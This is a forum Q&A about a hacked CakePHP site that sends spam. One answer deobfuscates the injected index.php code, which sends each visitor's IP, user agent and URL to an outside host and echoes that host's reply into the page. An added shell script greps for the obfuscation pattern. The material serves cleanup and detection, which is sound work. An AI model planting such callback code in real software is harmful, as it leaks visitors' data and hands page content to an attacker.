
Possible Duplicate:
My server's been hacked EMERGENCY

So basically my site got hacked and a script is sending more than 400 emails per day. I have more than 100 files on the server; is there any fast way to check exactly which file it is sending from? I don't know exactly when the script is sending the mails, so I can't be sure which file it's called from. Is there any easy way to find out which file it's sent from?

 eval(gzuncompress(base64_decode('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'))); ?> 

This was found in the index.php file.

My site is using CakePHP, so could it be there by default?

3 Answers

4

Be sure to read this topic. The best thing is to restore from backup. Also, when you do this, try to find out how they got in. Your code is probably flawed, so you will need to evaluate every single file by hand to find where your code is insecure. Refer to OWASP for best practices in securing web applications.

4

Here, I unraveled the code for you:

if(!isset($sRetry)){
    global $sRetry;
    $sRetry=1;
    $sUserAgent=strtolower($_SERVER['HTTP_USER_AGENT']);
    $stCurlHandle=NULL;
    $stCurlLink="";
    // Only visitors whose user agent is not a crawler or a common browser are targeted
    if((strstr($sUserAgent,'google')== false)&&(strstr($sUserAgent,'yahoo')== false)&&(strstr($sUserAgent,'baidu')== false)&&
       (strstr($sUserAgent,'msn')== false)&&(strstr($sUserAgent,'opera')== false)&&(strstr($sUserAgent,'chrome')== false)&&
       (strstr($sUserAgent,'bing')== false)&&(strstr($sUserAgent,'safari')== false)&&(strstr($sUserAgent,'bot')== false)){
        if(isset($_SERVER['REMOTE_ADDR'])== true && isset($_SERVER['HTTP_HOST'])== true){
            // Build the callback URL (base64 hides the domain) carrying the visitor's IP, user agent, host and path
            $stCurlLink=base64_decode('aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw') .'ip=' .urlencode($_SERVER['REMOTE_ADDR'])
                .'&useragent=' .urlencode($sUserAgent) .'&domainname=' .urlencode($_SERVER['HTTP_HOST'])
                .'&fullpath=' .urlencode($_SERVER['REQUEST_URI']) .'&check=' .isset($_GET['look']);
            $stCurlHandle=curl_init($stCurlLink);
        }
    }
    if($stCurlHandle !== NULL){
        curl_setopt($stCurlHandle,CURLOPT_RETURNTRANSFER,1);
        $sResult=@curl_exec($stCurlHandle);
        // A response starting with "O" is echoed into the page, so the remote server controls what visitors see
        if($sResult[0]=="O"){$sResult[0]=" ";echo $sResult;}
        curl_close($stCurlHandle);
    }
}

That $stCurlLink ends up becoming http://adveconfirm.com/stat/stat.php. I would recommend removing the code from the page and patching any vulnerabilities that you find. Take a look at your logs to see what pages were accessed by who and what data was sent.

citruspi
  • 166
0

You could also download all of the files using FTP, open them all with Notepad++ and search all the pages for "mail(". This should tell you where the mail scripts are in your site. Also beware in case there are viruses that the hacker(s) added to your site.

Ethan H
  • 101
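As an added example (not from the question or any of the answers), this shell script does the search Ethan H describes directly on the server: it greps a PHP tree for mail() calls and for the eval/base64_decode chain seen in the question's index.php, printing file and line for review. The directory layout and sample files it builds are constructed for the demonstration, not real site files.

```shell
#!/bin/sh
# Added example: locate PHP files that send mail or carry the
# eval(gzuncompress(base64_decode(...))) obfuscation from the question's index.php.
# Output is path:line:match, one hit per line, ready for manual review.
# Usage: scan_php_tree /var/www/mysite   (the path is an assumption)

scan_php_tree() {
    dir="$1"
    # -r recurse, -n line numbers, -E extended regex, -o print only the matched text.
    # Pattern 1: any mail( call (also catches sendmail()/imap_mail(), worth a look anyway).
    # Pattern 2: eval( wrapping an optional gzuncompress/gzinflate/str_rot13 around base64_decode.
    grep -rnEo --include='*.php' \
        -e 'mail[[:space:]]*\(' \
        -e 'eval[[:space:]]*\([[:space:]]*((gzuncompress|gzinflate|str_rot13)[[:space:]]*\()?[[:space:]]*base64_decode' \
        "$dir" 2>/dev/null | sort
}

# Build a small constructed site tree so the example runs offline.
make_sample_tree() {
    d="$(mktemp -d)"
    mkdir -p "$d/app/Controller"
    printf '<?php\nclass UsersController extends AppController {}\n' > "$d/app/Controller/UsersController.php"
    printf '<?php\n$msg = "hello";\nmail($to, "Contact form", $msg);\n' > "$d/app/Controller/ContactController.php"
    # Same shape as the injected line in the question; the payload is a placeholder, not the real blob.
    printf '<?php\n eval(gzuncompress(base64_decode("PAYLOAD_PLACEHOLDER"))); ?>\n' > "$d/index.php"
    printf 'mail( in a text file is ignored because only *.php is scanned\n' > "$d/README.txt"
    echo "$d"
}
```

On PHP 5.3 or later, setting mail.log to a file path and mail.add_x_header = On in php.ini makes PHP record the calling script and line for every mail() call, which pinpoints the sender even when the code is obfuscated enough for a grep to miss it.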